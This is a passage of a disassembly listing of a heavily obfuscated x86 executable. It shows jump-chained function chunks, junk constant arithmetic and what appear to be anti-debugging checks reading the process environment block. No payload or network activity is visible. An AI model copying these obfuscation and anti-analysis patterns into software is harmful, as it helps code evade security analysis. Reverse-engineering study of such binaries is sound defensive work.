		rol	eax, 3
		add	eax, 0E60589F2h

loc_45002F:				; CODE XREF: hvvrg7ie:0044A1FCj
		mov	eax, [eax]
		push	offset loc_44FEF0
		jmp	loc_446616
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BFE7

loc_45003B:				; CODE XREF: hvvrg7ie:0043D595j
					; sub_43BFE7:loc_44854Bj
		jz	loc_43C974
; END OF FUNCTION CHUNK	FOR sub_43BFE7
; START	OF FUNCTION CHUNK FOR sub_446F6D

loc_450041:				; CODE XREF: sub_446F6D:loc_446F75j
		jmp	loc_43CF4C
; END OF FUNCTION CHUNK	FOR sub_446F6D
; ---------------------------------------------------------------------------
		and	ecx, esi
		pop	ecx
		sub	esi, ebx
		or	ecx, 98999DC3h
		jmp	loc_43C974
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_152. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_450057:				; CODE XREF: hvvrg7ie:004575B3j
		jmp	loc_439B80
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439B29

loc_45005C:				; CODE XREF: sub_439B29:loc_4451F2j
		test	edi, ebp
		jmp	loc_4434A7
; END OF FUNCTION CHUNK	FOR sub_439B29
; ---------------------------------------------------------------------------

loc_450063:				; CODE XREF: hvvrg7ie:loc_447227j
		mov	eax, [edx]
		test	esi, edi
		jmp	loc_454FA6

; =============== S U B	R O U T	I N E =======================================



sub_45006C	proc near		; CODE XREF: hvvrg7ie:00443CB3j
					; sub_44BEBB+9B32p

; FUNCTION CHUNK AT 0044BF61 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	0BA0113CBh
		pop	esi
		and	esi, 18324FC1h
		test	esi, 100h
		jmp	loc_44BF61
sub_45006C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4495B9

loc_450087:				; CODE XREF: sub_4495B9+12j
		rol	eax, 3
		add	eax, 0EEBFAE47h
		mov	eax, [eax]
		or	eax, eax
		jnz	loc_43CC9F
		jmp	loc_4424D9
; END OF FUNCTION CHUNK	FOR sub_4495B9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_45009F:				; CODE XREF: sub_43F227+14E6Dj
		not	eax

loc_4500A1:				; CODE XREF: sub_43F227:loc_44006Fj
		lea	eax, [ebp-25Ch]
		cmp	dword ptr [eax], 47424454h
		jnz	loc_4395B8
		jmp	loc_451E37
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------

loc_4500B8:				; CODE XREF: hvvrg7ie:00446CECj
		pop	eax
		add	eax, 84AE8A4h
		sub	eax, 64671590h
		test	eax, 80000h
		jmp	loc_458DA8
; ---------------------------------------------------------------------------

loc_4500D0:				; DATA XREF: sub_44D3E8+BBEDo
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_447172
		jmp	loc_451C64
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44370F

loc_4500DF:				; CODE XREF: hvvrg7ie:004460D0j
					; sub_44370F+12313j ...
		pop	ecx
		xchg	esi, [esp+0]
		mov	ebp, esi
		pop	esi
		retn
; END OF FUNCTION CHUNK	FOR sub_44370F

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4500E7	proc near		; CODE XREF: hvvrg7ie:loc_43DEE6j
					; sub_43D47E+2358j ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0044C6F2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004570A3 SIZE 00000025 BYTES

		push	ebp
		mov	ebp, esp

loc_4500EA:				; CODE XREF: hvvrg7ie:0043925Fj
		push	ecx
		jmp	loc_44C6F2
sub_4500E7	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453E08

loc_4500F0:				; CODE XREF: sub_453E08-E26Dj
		mov	ds:dword_43D6F4, eax

loc_4500F5:				; CODE XREF: hvvrg7ie:0044B995j
		jmp	loc_451FC8
; END OF FUNCTION CHUNK	FOR sub_453E08

; =============== S U B	R O U T	I N E =======================================



sub_4500FA	proc near		; CODE XREF: sub_453E08j

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043AEF0 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043BDF0 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043D15C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E498 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043E4BD SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00440F66 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044336A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004440E6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044448F SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004445A4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004448CE SIZE 00000022 BYTES
; FUNCTION CHUNK AT 004470F8 SIZE 00000029 BYTES
; FUNCTION CHUNK AT 0044815F SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004483E9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E91B SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044EE00 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00450849 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452356 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452778 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045528C SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00457C1C SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00457FB8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AC5E SIZE 0000001B BYTES

		push	ebp
		mov	ebp, eax
		xchg	ebp, [esp+0]
		mov	eax, ebp
		jmp	loc_43AEF0
sub_4500FA	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_450107:				; CODE XREF: hvvrg7ie:0044C8A5j
		add	eax, 0FBAF8E48h
		cmp	eax, 36587153h
		jmp	loc_44C174
; ---------------------------------------------------------------------------
		ja	loc_43B6E7
		jmp	sub_44EDF0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4466CE

loc_450123:				; CODE XREF: sub_4466CE:loc_43F4E3j
					; hvvrg7ie:0043F4FEj
		add	edx, 9DC065F1h
		xchg	edx, [esp+0]
		jmp	loc_43B7A7
; END OF FUNCTION CHUNK	FOR sub_4466CE
; ---------------------------------------------------------------------------

loc_450131:				; CODE XREF: hvvrg7ie:0043C86Cj
		jbe	loc_448AD3
		popf

loc_450138:				; CODE XREF: hvvrg7ie:0043B184j
		add	eax, 0EF0FCEC8h
		call	sub_450C5A
		mov	ds:dword_41D128, eax
		lea	eax, nullsub_382
		jmp	loc_444020
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_450154:				; CODE XREF: sub_4465A6+F469j
		xor	eax, 75F82911h

loc_45015A:				; CODE XREF: sub_44BCAE:loc_440D58j
		add	eax, 357C457h
		call	sub_44059F
		push	esi
		jmp	loc_440FA8
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------

loc_45016B:				; CODE XREF: hvvrg7ie:00442592j
		or	ebx, 0B899916Dh
		js	loc_45600A
; START	OF FUNCTION CHUNK FOR sub_45A2CE

loc_450177:				; CODE XREF: sub_45A2CE+10j
		jmp	loc_44D322
; END OF FUNCTION CHUNK	FOR sub_45A2CE
; ---------------------------------------------------------------------------
		shl	ebp, 8
		jmp	loc_43E677
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_450184:				; CODE XREF: sub_445CCD+3B1Dj
		pop	ebp
		mov	eax, [esp+10h+var_10]
		push	edx
		call	sub_4403D4
		mov	eax, 320057C2h
		jmp	loc_439DBB
; END OF FUNCTION CHUNK	FOR sub_445CCD
; ---------------------------------------------------------------------------

loc_450198:				; CODE XREF: hvvrg7ie:loc_4553A6j
		jz	loc_447172
		jmp	loc_444D2B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A234

loc_4501A3:				; CODE XREF: sub_45A234-16B41j
		jnb	loc_45A096
; END OF FUNCTION CHUNK	FOR sub_45A234

; =============== S U B	R O U T	I N E =======================================



sub_4501A9	proc near		; CODE XREF: sub_45A234:loc_459A03j

; FUNCTION CHUNK AT 0044F425 SIZE 00000020 BYTES

		push	ebx
		push	0A9E21ECAh
		pop	ebx
		jmp	loc_44F425
sub_4501A9	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_4501B5:				; CODE XREF: sub_445CCD+6858j
		push	0E525D8CFh
		pop	ebx
		rol	ebx, 18h
		sub	ebx, 0FD277330h
		and	ebx, 0FF0AD6FCh

loc_4501CA:				; CODE XREF: sub_447610+11870j
		rol	ebx, 0Dh
		jmp	loc_43BBAD
; END OF FUNCTION CHUNK	FOR sub_445CCD
; ---------------------------------------------------------------------------
		jmp	ds:off_41D0A8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452EF6

loc_4501D8:				; CODE XREF: sub_452EF6+7j
		jmp	nullsub_519
; END OF FUNCTION CHUNK	FOR sub_452EF6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F98C

loc_4501DD:				; CODE XREF: sub_43F98C+12EC5j
		jmp	nullsub_159
; END OF FUNCTION CHUNK	FOR sub_43F98C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4478FE

loc_4501E2:				; CODE XREF: sub_4478FE+349Bj
		jmp	loc_43C9AB
; END OF FUNCTION CHUNK	FOR sub_4478FE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451669

loc_4501E7:				; CODE XREF: hvvrg7ie:004479C6j
					; hvvrg7ie:0045279Cj ...
		pop	edx
		jz	loc_4479CB
		mov	eax, [esp-8+arg_4]
		push	edx
		push	esi
		jmp	loc_4420A5
; END OF FUNCTION CHUNK	FOR sub_451669
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CB64

loc_4501F8:				; CODE XREF: sub_44CB64:loc_446261j
		jl	loc_446399
		jmp	loc_445214
; END OF FUNCTION CHUNK	FOR sub_44CB64
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_450203:				; CODE XREF: sub_43F227+12232j
		cmp	edi, 0AEAB58CBh
		jmp	loc_4498C5
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450590

loc_45020E:				; CODE XREF: sub_450590:loc_458828j
		jz	loc_4439BA
; END OF FUNCTION CHUNK	FOR sub_450590
; START	OF FUNCTION CHUNK FOR sub_43B6A5

loc_450214:				; CODE XREF: sub_43B6A5+C885j
		jmp	loc_459F3B
; END OF FUNCTION CHUNK	FOR sub_43B6A5
; ---------------------------------------------------------------------------
		pop	ecx
		jmp	loc_4439B7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4580B4

loc_45021F:				; CODE XREF: sub_4580B4:loc_44665Dj
		jnz	loc_4427EF
		add	ecx, eax
		shr	edi, 8

loc_45022A:				; CODE XREF: sub_44059F:loc_43AF8Bj
		and	eax, 94924064h
		jmp	loc_4427EF
; END OF FUNCTION CHUNK	FOR sub_4580B4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45889B

loc_450235:				; CODE XREF: sub_45889B:loc_4467B2j
		jz	loc_43FE79
		jmp	loc_44F72A
; END OF FUNCTION CHUNK	FOR sub_45889B
; ---------------------------------------------------------------------------

loc_450240:				; CODE XREF: hvvrg7ie:004507BBj
		jno	loc_43F18C

; =============== S U B	R O U T	I N E =======================================



sub_450246	proc near		; CODE XREF: sub_450246-111BAp

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00439353 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004397E2 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0043A6E2 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0043C054 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0043C53D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D6D0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E476 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043ED1D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F079 SIZE 00000027 BYTES
; FUNCTION CHUNK AT 00440CD6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441488 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00441733 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00442318 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044453B SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00444F16 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004457FF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446CD6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447182 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00447B55 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044893F SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00449B3C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044AF03 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044B5EF SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044D064 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0044D13E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044D971 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DD6A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044DF9B SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044E7E4 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 004518A9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456107 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045649D SIZE 00000025 BYTES
; FUNCTION CHUNK AT 00457D3D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459F78 SIZE 00000022 BYTES

		xchg	ecx, [esp-4+arg_0]

loc_450249:				; CODE XREF: hvvrg7ie:loc_44DD2Cj
		pop	ecx
		xchg	edx, [esp+0]

loc_45024D:				; CODE XREF: sub_44059F:loc_441F88j
		pushf
		jmp	loc_43A6E2
sub_450246	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453405

loc_450253:				; CODE XREF: sub_453405-62FDj
		ror	edi, 2
		test	edx, 554C6FFh
		jmp	loc_44EB9A
; END OF FUNCTION CHUNK	FOR sub_453405
; ---------------------------------------------------------------------------

loc_450261:				; CODE XREF: hvvrg7ie:00459722j
		xor	edi, 721BA6BCh
		jmp	loc_446B2D
; ---------------------------------------------------------------------------
		jmp	loc_442A83
; ---------------------------------------------------------------------------
		jmp	loc_459DD8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B048

loc_450276:				; CODE XREF: sub_45B048:loc_458ADDj
		mov	eax, large fs:30h
		add	eax, 54h
		mov	eax, [eax]
		or	eax, eax
		jz	sub_43B914
		jmp	loc_44EC74
; END OF FUNCTION CHUNK	FOR sub_45B048

; =============== S U B	R O U T	I N E =======================================



sub_45028F	proc near		; DATA XREF: sub_44352A+B5ECo

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043AC2B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443A68 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004529D5 SIZE 00000005 BYTES

		push	ebx
		push	655444F7h
		pop	ebx
		rol	ebx, 0Ah
		or	ebx, 0F49884D8h
		add	ebx, 0AA82D62h
		jmp	loc_43AC2B
sub_45028F	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B63C

loc_4502AA:				; CODE XREF: sub_43B63C+12157j
		rol	ebx, 15h
		add	ebx, 46B43C43h
		rol	ebx, 6
		or	ebx, 9DE7033h
		push	offset loc_44AE89
		jmp	loc_44401B
; END OF FUNCTION CHUNK	FOR sub_43B63C
; ---------------------------------------------------------------------------
		push	edi
		push	0E18F1F12h
		pop	edi
		rol	edi, 3
		jmp	loc_44328D
; ---------------------------------------------------------------------------

locret_4502D5:				; CODE XREF: hvvrg7ie:loc_450D0Bj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446FB6

loc_4502D6:				; CODE XREF: sub_446FB6+Aj
		jmp	loc_44EA5C
; END OF FUNCTION CHUNK	FOR sub_446FB6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_388. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451669

loc_4502DC:				; CODE XREF: sub_451669-A03Cj
		jmp	loc_447558
; END OF FUNCTION CHUNK	FOR sub_451669
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442ADB

loc_4502E1:				; CODE XREF: sub_442ADB+11j
		jmp	loc_43E4D9
; END OF FUNCTION CHUNK	FOR sub_442ADB
; ---------------------------------------------------------------------------
		mov	ebx, [edi]
		adc	ebx, 3A06551Ch
		jmp	sub_43CFCA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448100

loc_4502F3:				; CODE XREF: sub_448100:loc_447897j
		cmp	dword ptr [ebp-4], 0
		jz	loc_441477

loc_4502FD:				; CODE XREF: hvvrg7ie:00453F32j
		jmp	loc_442853
; END OF FUNCTION CHUNK	FOR sub_448100
; ---------------------------------------------------------------------------

loc_450302:				; DATA XREF: sub_443345+9o
		lea	eax, [ebp-14h]
		push	offset sub_43C491
		jmp	locret_451E77
; ---------------------------------------------------------------------------

loc_45030F:				; DATA XREF: sub_448AE0+Co
		mov	esp, ebp
		pop	ebp
		mov	eax, ds:dword_452320
		or	eax, eax

loc_45031A:				; CODE XREF: hvvrg7ie:loc_4547B3j
		jnz	loc_44984D
		jmp	loc_45217E
; ---------------------------------------------------------------------------
		xor	eax, esi
		or	eax, ecx
		jmp	sub_447BD1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_45032E:				; CODE XREF: sub_43F227:loc_43BBB2j
		jz	loc_4525B8
		jmp	loc_43D6E8
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------

locret_450339:				; CODE XREF: hvvrg7ie:00453906j
		retn
; ---------------------------------------------------------------------------

locret_45033A:				; CODE XREF: hvvrg7ie:0044C8F0j
		retn
; ---------------------------------------------------------------------------
		test	ecx, edi
		jmp	loc_449B5D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_450342:				; CODE XREF: sub_454099:loc_45507Bj
		pop	edi
		xchg	edi, [esp+4+var_4]
; END OF FUNCTION CHUNK	FOR sub_454099
; START	OF FUNCTION CHUNK FOR sub_443375

loc_450346:				; CODE XREF: sub_443375:loc_448600j
		push	ecx
		push	0E5417585h
		pop	ecx
		sub	ecx, 9080358Dh
		and	ecx, 1A0099C7h
		jmp	loc_4577F2
; END OF FUNCTION CHUNK	FOR sub_443375
; ---------------------------------------------------------------------------

loc_45035E:				; DATA XREF: sub_442642+Ao
		add	edx, ebp
		add	edx, 0B794337h
		mov	edx, [edx]
		imul	byte ptr [edx]
		jmp	loc_4577FC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4548C9

loc_45036F:				; CODE XREF: sub_4548C9:loc_4495A6j
		add	eax, 20B4A63Ch
		add	eax, ebp
		add	eax, 0A55D36BBh
		push	eax
		push	4
		push	offset sub_452EF6
		jmp	nullsub_195
; END OF FUNCTION CHUNK	FOR sub_4548C9

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_45038A	proc near		; CODE XREF: sub_44ABE8:loc_442342j
		retn
sub_45038A	endp


; =============== S U B	R O U T	I N E =======================================



sub_45038B	proc near		; CODE XREF: hvvrg7ie:0043F614j
					; sub_450AA8+1p

var_C		= dword	ptr -0Ch
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043921F SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043A6CB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043AF0A SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0043BD58 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043C840 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0043CB40 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FE10 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 004408BD SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00440A5B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441F8D SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004428F7 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00443434 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00443917 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00443E79 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00445914 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445A64 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044604B SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044666E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447396 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00448C1F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A8C9 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044B12A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044CE4C SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044DCE0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044EAF8 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004522D9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004529A2 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00455114 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 0045581A SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00455C67 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004564FA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A1BF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A31F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AFE8 SIZE 00000018 BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	0DE9ABC91h
		pop	ebx
		and	ebx, 0C5D9DDD5h
		sub	ebx, 6E6F6606h
		and	ebx, 0BF20C5C3h
		jns	loc_4408BD

loc_4503AD:				; CODE XREF: sub_456209+6j
		jmp	loc_443917
sub_45038B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451F50

loc_4503B2:				; CODE XREF: sub_451F50-4156j
		jmp	loc_43AD49
; END OF FUNCTION CHUNK	FOR sub_451F50
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D671

loc_4503B7:				; CODE XREF: sub_44D671-241Ej
		jmp	loc_444A43
; END OF FUNCTION CHUNK	FOR sub_44D671
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4447AC

loc_4503BC:				; CODE XREF: sub_4447AC:loc_44850Aj
		push	edx
		mov	edx, edi
		xchg	edx, [esp+4+var_4]
		push	0B7CB502Fh
		pop	edi
		add	edi, 0C1468F1Eh
		jmp	loc_4408A4
; END OF FUNCTION CHUNK	FOR sub_4447AC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445E62

loc_4503D3:				; CODE XREF: sub_445E62+6FCBj
		or	ebp, ebx
; END OF FUNCTION CHUNK	FOR sub_445E62
; START	OF FUNCTION CHUNK FOR sub_43C811

loc_4503D5:				; CODE XREF: sub_43C811:loc_43A38Bj
					; sub_43C811+B100j ...
		jmp	loc_43CC5A
; ---------------------------------------------------------------------------

loc_4503DA:				; CODE XREF: sub_445E62+6j
					; sub_43C811+161B3j
		pop	ecx
		push	offset loc_44C12B
		jmp	loc_44C3D7
; END OF FUNCTION CHUNK	FOR sub_43C811
; ---------------------------------------------------------------------------

loc_4503E5:				; CODE XREF: hvvrg7ie:004550A5j
		retn
; ---------------------------------------------------------------------------
		add	edi, 2479B158h
		jmp	loc_443084
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_4503F1:				; CODE XREF: sub_43F227:loc_449FA9j
		mov	eax, [eax]
		mov	al, [eax]
		js	loc_4539DA
		sub	al, 99h
		mov	edx, [ebp-4]
		jmp	loc_454334
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452F3F

loc_450405:				; CODE XREF: sub_452F3F+3520j
		push	esi
		push	792850D7h
		pop	esi
		xor	esi, 0F44AAA07h
		add	esi, 72E11A77h
		xchg	esi, [esp+4+var_4]
		jmp	sub_447883
; END OF FUNCTION CHUNK	FOR sub_452F3F
; ---------------------------------------------------------------------------

loc_450420:				; CODE XREF: hvvrg7ie:00451788j
		and	eax, 0D98AB3F1h
		add	eax, 273B43A9h
		xchg	eax, [esp]
		jmp	loc_44089F

; =============== S U B	R O U T	I N E =======================================



sub_450434	proc near		; CODE XREF: hvvrg7ie:0043A436j
					; sub_446B6B+A5Fp ...

arg_8		= dword	ptr  0Ch

; FUNCTION CHUNK AT 0043936B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00439BDF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00439DF3 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0043A576 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043B5FC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043B984 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043C921 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D034 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E3A5 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043EA4F SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043ED31 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F0C9 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043F1DC SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0043F35F SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0043F3FF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FC69 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043FF88 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004403F6 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044097D SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00441257 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442172 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00442B7A SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044427F SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00444480 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444A12 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445162 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00446008 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00447639 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044843D SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00448A79 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00448EE6 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00448F0C SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0044A337 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044A6AA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A6E5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B9EA SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044C9E7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CE5E SIZE 0000002C BYTES
; FUNCTION CHUNK AT 0044CE9C SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0044E37F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E5E5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EA8B SIZE 0000002C BYTES
; FUNCTION CHUNK AT 0044F73C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044FC42 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045133C SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00451918 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004521C9 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00452827 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045318B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453C5C SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00453F1F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455771 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455D05 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00456075 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004572B8 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00458756 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459387 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459A2E SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0045AA14 SIZE 0000000E BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		mov	eax, [ebp-4]
		mov	al, [eax]
